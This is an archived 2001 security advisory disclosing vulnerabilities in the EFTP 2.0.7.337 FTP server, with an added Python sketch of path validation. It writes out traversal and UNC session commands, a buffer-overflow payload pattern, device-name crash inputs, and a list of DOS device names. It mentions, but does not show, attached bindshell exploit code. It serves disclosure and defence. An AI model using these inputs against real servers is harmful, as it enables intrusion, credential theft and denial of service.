Date: Wed, 12 Sep 2001 04:36:22 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]
Subject: EFTP Version 2.0.7.337 vulnerabilities
EFTP Version 2.0.7.337 vulnerabilities
According to their site @ www.eftp.org
"EFTP is a 32bit combined Client/Server application,
basically 2 programs in one. EFTP incorporates the
448bit Blowfish Encryption Algorithm and the FTP
protocol (RFC 959 implementation) to provide secure
file transfers over TCP/IP based networks (The
Internet) providing strong encryption when the remote
and local hosts both use EFTP."
EFTP runs under Win9x/NT/2000/ME/XP.
The program has some bugs, and some of them
might lead to a full system compromise. I will try to
put an up-to-date version of this advisory online @
www.byterage.cjb.net
1) Revelation of drive contents & NetBIOS password
hash retrieval via the LIST command
Example session (using the sample account):
USER SampleUser
PASS NothingSpectacular
LS ../*
LS c:/*
LS /c:/*.bat
LS a:/
...
This way we can browse through all resources available
to the machine.
We can also use UNC (Universal Naming Convention)
pathnames (\\), meaning that we can force the FTP
server to make an outbound NetBIOS connection to the
internet and sniff the credentials. Since the captured
credentials could then be decrypted using tools like
L0phtcrack, this could lead to a full system
compromise. This type of attack - and the solution -
has already been discussed by Rob Beck of @stake, Inc.
for G6 FTP Server at
http://www.atstake.com/research/advisories/2001/a040301-1.txt.
2) Revelation of drive contents via the SIZE and MDTM
commands
Example session:
QUOTE SIZE ../autoexec.bat
213 900
QUOTE MDTM ../autoexec.bat
213 20010901063342.000
So both SIZE and MDTM tell us that ../autoexec.bat
exists, in contrast to:
QUOTE SIZE ../notthere
550 Command failed: File not found.
QUOTE MDTM ../notthere
550 'c:\restricted\..\notthere':no such file or
directory
What's that? With the last command we can also obtain
the name of our home directory!
Indeed, but the home directory is also available
through a PWD command or a GET of a nonexistent file,
as the makers don't seem to see a problem in users
knowing their absolute home directory.
We can use the file lengths the SIZE command gives us
to determine the exact Windows OS version &
associated DLL versions, which might come in handy in
further (buffer overflow) attacks.
Since we can also use wildcards, we can 'bruteforce'
the filenames to map out the drive contents via SIZE
or MDTM commands. This type of attack has proven to
work on other FTP server software as well (GuildFTPd
<= v0.992); the proof of concept code (ftpsizemap.pl)
is attached to this mail.
3) Remotely exploitable buffer overflow / Denial of
Service attacks
Users with upload permissions can upload a *.lnk file
which contains:
("A" x 1744) . "CCCC"
Issuing an LS command will then cause the EIP to be
changed to 043434343h ("CCCC"). Exploit code
(ex_eftp.c) which spawns a bindshell is attached to
this mail.
This buffer overflow could also lead to a DoS
attack...
Another Denial of Service can be caused by repeatedly
sending the command CWD A:, which queries the A:
drive. (but this could already be done via an LS A:\)
Another way to do a DoS could be sending a GET AUX.
which crashes win98 machines.
A GET /CON/CON is not filtered either... ==> crash on
unpatched win9x
And a PUT C:\PHEARME.TXT PRN.F00 makes nice printouts
on the remote machine ;) (if the printer is on, if
it's not on, the computer freezes until the printer is
turned on)
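
The path handling that sections 1 to 3 show to be missing, sketched
as an added example (not code from EFTP or from this advisory): every
client-supplied path is confined to the account's home directory, and
UNC paths, drive letters and DOS device names are refused. The names
resolve, verdict and PathRejected are hypothetical; c:\restricted is
the home directory shown in the 550 reply above.

```python
import ntpath

# DOS device names Windows resolves in any directory, with any extension.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)}

class PathRejected(ValueError):
    pass

def resolve(home, cwd, arg):
    """Map a client path to a real path under `home`, or raise PathRejected.

    home: the account's real root (c:\\restricted in the 550 reply above)
    cwd:  the session's virtual working directory ("/" or "/pub")
    arg:  the untrusted argument of LIST, SIZE, MDTM, CWD, RETR or STOR
    """
    p = arg.replace("/", "\\")
    if p.startswith("\\\\"):
        raise PathRejected("UNC path")
    if ":" in p:
        raise PathRejected("drive letter or stream")
    if not p.startswith("\\"):                 # relative to the virtual cwd
        p = cwd.replace("/", "\\") + "\\" + p
    parts = []
    for comp in p.split("\\"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:                      # would climb above the home
                raise PathRejected("escapes home directory")
            parts.pop()
            continue
        # "AUX.", "PRN.F00" and "con " all open the device: compare the stem.
        if comp.split(".")[0].rstrip(" ").upper() in RESERVED:
            raise PathRejected("DOS device name")
        parts.append(comp)
    full = ntpath.normpath(ntpath.join(home, *parts))
    # Defence in depth: the result must still sit under the home directory.
    if ntpath.commonpath([home, full]).lower() != ntpath.normpath(home).lower():
        raise PathRejected("escapes home directory")
    return full

def verdict(arg, home="c:\\restricted", cwd="/"):
    """Return the resolved path, or 'REJECTED: <reason>' for a 550 reply."""
    try:
        return resolve(home, cwd, arg)
    except PathRejected as exc:
        return f"REJECTED: {exc}"
```

A rejected path should get the same generic 550 reply whether or not
the target exists, so that SIZE and MDTM stop acting as an existence
oracle.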
4) Plaintext password storage
The passwords are stored without encryption in the
\Program Files\eftp2\eftp2users.dat file. The risk is
obvious when combined with enough privileges to
remotely spawn a bindshell using the remote *.lnk
buffer overflow I demonstrated earlier.
VENDOR STATUS
I have notified the programmers; they responded that
they will release an update that fixes these bugs as
soon as possible.
GREETS & THANKS
all the #securax people, incubus, Zoa Chien, sentinel,
woody, AreS, r00t-dude, eXploitek, phr0zen, nsanity,
... the party animals :) Wouter H., Maarten V.H.,
Kristof D.(x2), Bart D.B., Cindy V.
[ByteRage] [email protected] www.byterage.cjb.net
Attachments: ex_eftpd.c, ftpsizemap.pl